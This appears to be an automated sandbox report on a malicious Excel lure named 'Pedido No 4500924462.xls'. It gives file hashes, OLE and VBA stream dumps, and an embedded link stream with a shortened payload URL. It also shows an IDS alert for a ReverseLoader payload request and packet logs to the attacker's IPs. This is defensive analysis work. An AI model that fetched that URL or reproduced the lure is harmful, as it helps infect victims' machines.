                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 26 16:24:49 2024, Security: 1
                                                                      Entropy (8bit):7.873722803838912
                                                                      TrID:
                                                                      • Microsoft Excel sheet (30009/1) 47.99%
                                                                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                      File name:Pedido No 4500924462.xls
                                                                      File size:240'128 bytes
                                                                      MD5:456ff43e8b42a2043afc83c4474872d5
                                                                      SHA1:a18cb477550dc4eda2e5f0d22b2ffb5a71dbeb13
                                                                      SHA256:ae99e5fea931ceed4641e248fc8f06fb314d4c12111b92871e6bf45c69d93188
                                                                      SHA512:9293ac9a536c2fb507c7bc50c1c4dcebaf680df263bf89cb0758df60c45c26c2e7aed657252a606259b0b0ba58e00ea70a198d6a9a1b6ddd3896decae9558ac0
                                                                      SSDEEP:6144:CAu6uXDABZG5pTKZr7EHhFLkNYRIfC+I3:SDABsEtNYRS
                                                                      TLSH:B834121C7276C101E6A64A3C1ED4C2D7A6B4FC9AEF0EC61B3294771F8D3B49299435CA
                                                                      File Content Preview:........................>...................................$...................g.......i......................................................................................................................................................................

                                                                      File Icon

                                                                      Icon Hash:276ea3a6a6b7bfbf

                                                                      Static OLE Info

                                                                      General

                                                                      Document Type:OLE
                                                                      Number of OLE Files:1

                                                                      OLE File "Pedido No 4500924462.xls"

                                                                      Indicators
                                                                      Has Summary Info:
                                                                      Application Name:Microsoft Excel
                                                                      Encrypted Document:True
                                                                      Contains Word Document Stream:False
                                                                      Contains Workbook/Book Stream:True
                                                                      Contains PowerPoint Document Stream:False
                                                                      Contains Visio Document Stream:False
                                                                      Contains ObjectPool Stream:False
                                                                      Flash Objects Count:0
                                                                      Contains VBA Macros:True
                                                                      Summary
                                                                      Code Page:1252
                                                                      Author:
                                                                      Last Saved By:
                                                                      Create Time:2006-09-16 00:00:00
                                                                      Last Saved Time:2024-11-26 16:24:49
                                                                      Creating Application:Microsoft Excel
                                                                      Security:1
                                                                      Document Summary
                                                                      Document Code Page:1252
                                                                      Thumbnail Scaling Desired:False
                                                                      Contains Dirty Links:False
                                                                      Shared Document:False
                                                                      Changed Hyperlinks:False
                                                                      Application Version:786432

                                                                      Streams with VBA

                                                                      VBA File Name: Sheet1.cls, Stream Size: 977
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                      VBA File Name:Sheet1.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0 .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 86 89 8c d4 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      VBA Code
                                                                      Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                      VBA File Name: Sheet2.cls, Stream Size: 977
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                      VBA File Name:Sheet2.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] ] . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 86 89 5d 5d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      VBA Code
                                                                      Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                      VBA File Name: Sheet3.cls, Stream Size: 977
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                      VBA File Name:Sheet3.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 86 89 0d c1 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      VBA Code
                                                                      Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                      VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                      VBA File Name:ThisWorkbook.cls
                                                                      Stream Size:985
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < - . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 86 89 3c 2d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      VBA Code
                                                                      Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                      Streams

                                                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                      General
                                                                      Stream Path:\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:114
                                                                      Entropy:4.25248375192737
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                      General
                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:244
                                                                      Entropy:2.889430592781307
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                      General
                                                                      Stream Path:\x5SummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:200
                                                                      Entropy:3.2696169807235007
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . @ . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                      Stream Path: MBD0006D5B9/\x1CompObj, File Type: data, Stream Size: 99
                                                                      General
                                                                      Stream Path:MBD0006D5B9/\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:99
                                                                      Entropy:3.631242196770981
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Stream Path: MBD0006D5B9/Package, File Type: Microsoft Excel 2007+, Stream Size: 16804
                                                                      General
                                                                      Stream Path:MBD0006D5B9/Package
                                                                      CLSID:
                                                                      File Type:Microsoft Excel 2007+
                                                                      Stream Size:16804
                                                                      Entropy:7.59049937623385
                                                                      Base64 Encoded:True
                                                                      Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Stream Path: MBD0006D5BA/\x1Ole, File Type: data, Stream Size: 672
                                                                      General
                                                                      Stream Path:MBD0006D5BA/\x1Ole
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:672
                                                                      Entropy:4.568201476729664
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . E . 4 M . . . . . . . . . . . . . . . . y . . . K . . . . . h . t . t . p . s . : . / . / . l . j . g . . . c . l . / . m . w . o . I . ? . & . p . u . t . = . s . t . r . a . i . g . h . t . & . g . l . i . d . e . r . = . b . a . w . d . y . & . m . i . c . e . = . a . c . c . u . r . a . t . e . & . i . c . e . b . r . e . a . k . e . r . = . q . u . e . s . t . i . o . n . a . b . l . e . & . r . i . v . e . r . b . e . d . = . o . r . a . n . g . e . & . s . l . i . c . e . . . q . S . O Z 9
                                                                      Data Raw:01 00 00 02 45 90 a6 02 34 97 ac 4d 00 00 00 00 00 00 00 00 00 00 00 00 0a 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 06 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6c 00 6a 00 67 00 2e 00 63 00 6c 00 2f 00 6d 00 77 00 6f 00 49 00 3f 00 26 00 70 00 75 00 74 00 3d 00 73 00 74 00 72 00 61 00 69 00 67 00 68 00 74 00 26 00 67 00 6c 00 69 00 64 00 65 00 72 00
                                                                      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 207220
                                                                      General
                                                                      Stream Path:Workbook
                                                                      CLSID:
                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                      Stream Size:207220
                                                                      Entropy:7.99733421223463
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . ' H . . . G H j . . ^ . . = - . . O h \\ $ . . # ) . ^ b W D . K . B . . . . . . . . . . . \\ . p . . _ x Z F v . . . p 4 o # N Z . o u X . B 0 . B ~ . F ` . . N ( 1 . . ^ . . . . V 9 . . R E } H . B 5 3 . . ^ Q \\ G " H V W [ 5 B . . . = a . . . m . . . = . . . . . . . F ^ , f . . @ = . . . U N . . . . L : . . . . . . . . . . . . . . . . . u . = . . . 5 $ j * o m S . . W l @ . . . / . . . . b " . . . . . . . } i . . . . . . . ^ 1 . . . . 8 D . . k W D
                                                                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 27 48 04 e3 05 2e 83 47 48 6a bb fd bc 18 19 5e 09 d1 97 3d 2d 05 7f 82 4f 68 5c 24 0f 19 23 29 dd d7 b2 5e 62 c3 57 44 7f 99 4b cc b2 fb e0 42 e1 00 02 00 b0 04 c1 00 02 00 91 17 e2 00 00 00 5c 00 70 00 8b fc c8 90 5f b1 78 5a 46 d5 76 09 d5 bb 20 1e 70 34 ad 6f 23 c4 4e b4 5a 08 ce 6f 75 8a
                                                                      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 529
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                      CLSID:
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Stream Size:529
                                                                      Entropy:5.223299254457375
                                                                      Base64 Encoded:True
                                                                      Data ASCII:I D = " { 8 4 9 6 C D 3 2 - D 6 5 9 - 4 5 A F - 8 F 5 7 - 2 D E 8 A D F 9 F F 3 4 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 6 C 4 D 9 E 5 D 9 E D D B F 1 D
                                                                      Data Raw:49 44 3d 22 7b 38 34 39 36 43 44 33 32 2d 44 36 35 39 2d 34 35 41 46 2d 38 46 35 37 2d 32 44 45 38 41 44 46 39 46 46 33 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                      Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:104
                                                                      Entropy:3.0488640812019017
                                                                      Base64 Encoded:False
                                                                      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:2644
                                                                      Entropy:3.9953773243770323
                                                                      Base64 Encoded:False
                                                                      Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                      Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                      Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:553
                                                                      Entropy:6.370920844802575
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . f > X i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                                      Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 66 3e 58 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-27T17:56:25.440158+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.224917423.95.128.21580TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 27, 2024 17:55:57.479942083 CET49165443192.168.2.22152.231.102.107
                                                                      Nov 27, 2024 17:55:57.479979992 CET44349165152.231.102.107192.168.2.22
                                                                      Nov 27, 2024 17:55:57.480053902 CET49165443192.168.2.22152.231.102.107
                                                                      Nov 27, 2024 17:55:57.539787054 CET49165443192.168.2.22152.231.102.107
                                                                      Nov 27, 2024 17:55:57.539803982 CET44349165152.231.102.107192.168.2.22
                                                                      Nov 27, 2024 17:55:59.148143053 CET44349165152.231.102.107192.168.2.22
                                                                      Nov 27, 2024 17:55:59.148556948 CET49165443192.168.2.22152.231.102.107
                                                                      Nov 27, 2024 17:55:59.153963089 CET49165443192.168.2.22152.231.102.107
                                                                      Nov 27, 2024 17:55:59.153984070 CET44349165152.231.102.107192.168.2.22
                                                                      Nov 27, 2024 17:55:59.154311895 CET44349165152.231.102.107192.168.2.22
                                                                      Nov 27, 2024 17:55:59.154371023 CET49165443192.168.2.22152.231.102.107
                                                                      Nov 27, 2024 17:55:59.228833914 CET49165443192.168.2.22152.231.102.107
                                                                      Nov 27, 2024 17:55:59.275331020 CET44349165152.231.102.107192.168.2.22
                                                                      Nov 27, 2024 17:55:59.795450926 CET44349165152.231.102.107192.168.2.22
                                                                      Nov 27, 2024 17:55:59.795536041 CET44349165152.231.102.107192.168.2.22
                                                                      Nov 27, 2024 17:55:59.795634031 CET49165443192.168.2.22152.231.102.107
                                                                      Nov 27, 2024 17:55:59.795659065 CET49165443192.168.2.22152.231.102.107
                                                                      Nov 27, 2024 17:55:59.796811104 CET49165443192.168.2.22152.231.102.107
                                                                      Nov 27, 2024 17:55:59.796838045 CET44349165152.231.102.107192.168.2.22
                                                                      Nov 27, 2024 17:55:59.805088043 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:55:59.925091028 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:55:59.925291061 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:55:59.925378084 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:00.047216892 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.144768000 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.144795895 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.144807100 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.144913912 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.144953012 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.144968033 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.144984007 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.144995928 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.145009041 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.145021915 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.145077944 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.145077944 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.145240068 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.145252943 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.145317078 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.150568008 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.265113115 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.265167952 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.265216112 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.265216112 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.269339085 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.269386053 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.355355978 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.355393887 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.355432987 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.355473995 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.359297037 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.359349012 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.359505892 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.359551907 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.367825031 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.367887020 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.368277073 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.368323088 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.376252890 CET804916623.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:01.376343012 CET4916680192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:01.376565933 CET804916623.95.128.215192.168.2.22
